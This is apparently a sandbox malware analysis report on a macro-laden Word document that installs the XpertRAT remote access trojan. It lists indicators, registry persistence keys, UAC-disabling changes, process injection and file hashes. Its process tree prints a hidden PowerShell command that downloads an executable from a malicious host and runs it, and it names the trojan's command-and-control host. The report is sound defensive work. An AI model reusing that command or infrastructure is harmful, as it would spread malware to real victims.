xpertrat | 39f9e4df37b9d4b3e5ad5df753c9e8c3617472f3cfa778e43ddd822544455788

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7-en
submitted
16-09-2021 15:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO sept2116 FRP-SHM.doc
Size

341KB
MD5

dc9a33a35b76796e46c64dd1b464b12f
SHA1

a235e802a62465a8985af532730d89e60f17f982
SHA256

39f9e4df37b9d4b3e5ad5df753c9e8c3617472f3cfa778e43ddd822544455788
SHA512

f07653cea29668a76197ae59c5ca7e918517d068a5050df4a5bd1d3261a1451df7d164c197151a9c0dbd61b697c66054b9383d7b92a3c73925ad1bfaacc07f94

Score

10^/10

xpertrat test evasion persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://esetnode32-antiviru.ydns.eu/EXCEL.exe

Extracted

Family

xpertrat

Version

3.0.10

Botnet

Test

kapasky-antivirus.firewall-gateway.net:4000

Mutex

L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1212	1316	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1636	1316	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1904	1316	powershell.exe	WINWORD.EXE

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
XpertRAT
XpertRAT is a remote access trojan with various capabilities.
rat xpertrat

XpertRAT Core Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2020-128-0x0000000000400000-0x0000000000443000-memory.dmp	xpertrat
behavioral1/memory/2020-129-0x0000000000401364-mapping.dmp	xpertrat

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1212 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

EXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exe

pid process

684 EXCEL.exe
1748 EXCEL.exe
1796 EXCEL.exe
1644 EXCEL.exe
1632 EXCEL.exe
Loads dropped DLL 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exe

pid process

1212 powershell.exe
1636 powershell.exe
1904 powershell.exe
684 EXCEL.exe
1796 EXCEL.exe
1796 EXCEL.exe
Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

EXCEL.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" EXCEL.exe

flow	pid	process
7	1212	powershell.exe

pid	process
684	EXCEL.exe
1748	EXCEL.exe
1796	EXCEL.exe
1644	EXCEL.exe
1632	EXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0"	EXCEL.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe"	iexplore.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

EXCEL.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

EXCEL.exeEXCEL.exeEXCEL.exe

description	pid	process	target process
PID 684 set thread context of 1632	684	EXCEL.exe	EXCEL.exe
PID 1796 set thread context of 324	1796	EXCEL.exe	EXCEL.exe
PID 1632 set thread context of 2020	1632	EXCEL.exe	iexplore.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1316 WINWORD.EXE

pid	process
1316	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exe

pid	process
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
1904	powershell.exe
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
1904	powershell.exe
1904	powershell.exe
296	powershell.exe
1980	powershell.exe
684	EXCEL.exe
684	EXCEL.exe
1796	EXCEL.exe
1796	EXCEL.exe
1796	EXCEL.exe
1796	EXCEL.exe
1796	EXCEL.exe
1796	EXCEL.exe
1632	EXCEL.exe
1632	EXCEL.exe
1632	EXCEL.exe
1632	EXCEL.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exepowershell.exepowershell.exeiexplore.exe

description	pid	process
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	1748	EXCEL.exe
Token: SeDebugPrivilege	1796	EXCEL.exe
Token: SeDebugPrivilege	684	EXCEL.exe
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	2020	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXEEXCEL.exeiexplore.exe

pid process

1316 WINWORD.EXE
1316 WINWORD.EXE
1316 WINWORD.EXE
1316 WINWORD.EXE
1632 EXCEL.exe
2020 iexplore.exe

pid	process
1316	WINWORD.EXE
1316	WINWORD.EXE
1316	WINWORD.EXE
1316	WINWORD.EXE
1632	EXCEL.exe
2020	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exe

description	pid	process	target process
PID 1316 wrote to memory of 1212	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1212	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1212	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1212	1316	WINWORD.EXE	powershell.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1212 wrote to memory of 684	1212	powershell.exe	EXCEL.exe
PID 1316 wrote to memory of 1636	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1636	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1636	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1636	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1904	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1904	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1904	1316	WINWORD.EXE	powershell.exe
PID 1316 wrote to memory of 1904	1316	WINWORD.EXE	powershell.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1636 wrote to memory of 1748	1636	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1904 wrote to memory of 1796	1904	powershell.exe	EXCEL.exe
PID 1796 wrote to memory of 296	1796	EXCEL.exe	powershell.exe
PID 1796 wrote to memory of 296	1796	EXCEL.exe	powershell.exe
PID 1796 wrote to memory of 296	1796	EXCEL.exe	powershell.exe
PID 1796 wrote to memory of 296	1796	EXCEL.exe	powershell.exe
PID 1748 wrote to memory of 1612	1748	EXCEL.exe	powershell.exe
PID 1748 wrote to memory of 1612	1748	EXCEL.exe	powershell.exe
PID 1748 wrote to memory of 1612	1748	EXCEL.exe	powershell.exe
PID 1748 wrote to memory of 1612	1748	EXCEL.exe	powershell.exe
PID 684 wrote to memory of 1980	684	EXCEL.exe	powershell.exe
PID 684 wrote to memory of 1980	684	EXCEL.exe	powershell.exe
PID 684 wrote to memory of 1980	684	EXCEL.exe	powershell.exe
PID 684 wrote to memory of 1980	684	EXCEL.exe	powershell.exe
PID 1316 wrote to memory of 2016	1316	WINWORD.EXE	splwow64.exe
PID 1316 wrote to memory of 2016	1316	WINWORD.EXE	splwow64.exe
PID 1316 wrote to memory of 2016	1316	WINWORD.EXE	splwow64.exe
PID 1316 wrote to memory of 2016	1316	WINWORD.EXE	splwow64.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 1796 wrote to memory of 1644	1796	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe
PID 684 wrote to memory of 1632	684	EXCEL.exe	EXCEL.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

EXCEL.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	EXCEL.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO sept2116 FRP-SHM.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:1632

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2020

C:\Windows\SysWOW64\notepad.exe
notepad.exe
6⤵
PID:2028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
4⤵
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://esetnode32-antiviru.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904

C:\Users\Admin\AppData\Roaming\EXCEL.exe
"C:\Users\Admin\AppData\Roaming\EXCEL.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
- Executes dropped EXE
PID:1644

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
4⤵
PID:324

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2016

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
c76ec9954800eb464c7c885dd79bd4c5

SHA1
5668d6f08b21f614b090372be8e0e82fb4e2a020

SHA256
71e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc

SHA512
fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
c76ec9954800eb464c7c885dd79bd4c5

SHA1
5668d6f08b21f614b090372be8e0e82fb4e2a020

SHA256
71e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc

SHA512
fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
c76ec9954800eb464c7c885dd79bd4c5

SHA1
5668d6f08b21f614b090372be8e0e82fb4e2a020

SHA256
71e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc

SHA512
fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
c76ec9954800eb464c7c885dd79bd4c5

SHA1
5668d6f08b21f614b090372be8e0e82fb4e2a020

SHA256
71e0c865d9517d95846934eb8949a3fee2c5fbd867d165e21718ee6aefa8ebdc

SHA512
fba98bc4b3df8e4022f8a5f8397c1b97a0bc34cf2ec6e5afb03a8a70e0f2c8e36adaad61cc91ffe6fe5237b97d07e93652988e4e6110b8aa4c664fd9af85f2cc

Download Submit
\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
\Users\Admin\AppData\Local\Temp\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
\Users\Admin\AppData\Roaming\EXCEL.exe
MD5
230811e776cb540cbc2a06fe4adaf339

SHA1
d679baca39696f690213099869bf6efc1cc8c560

SHA256
99cbeacdfcb2dd2e6cb5c4e7a2798a77b334c6e606173b55dc2a049d965ee0fd

SHA512
c4e164de556f929870b9e4f9a9daf48871faff4a4c1bd75f8304990272fd74894074904f849978a3a4fd2cfda5ba782f9d6df00d20783ac763ab1e279f7dfe18

Download Submit
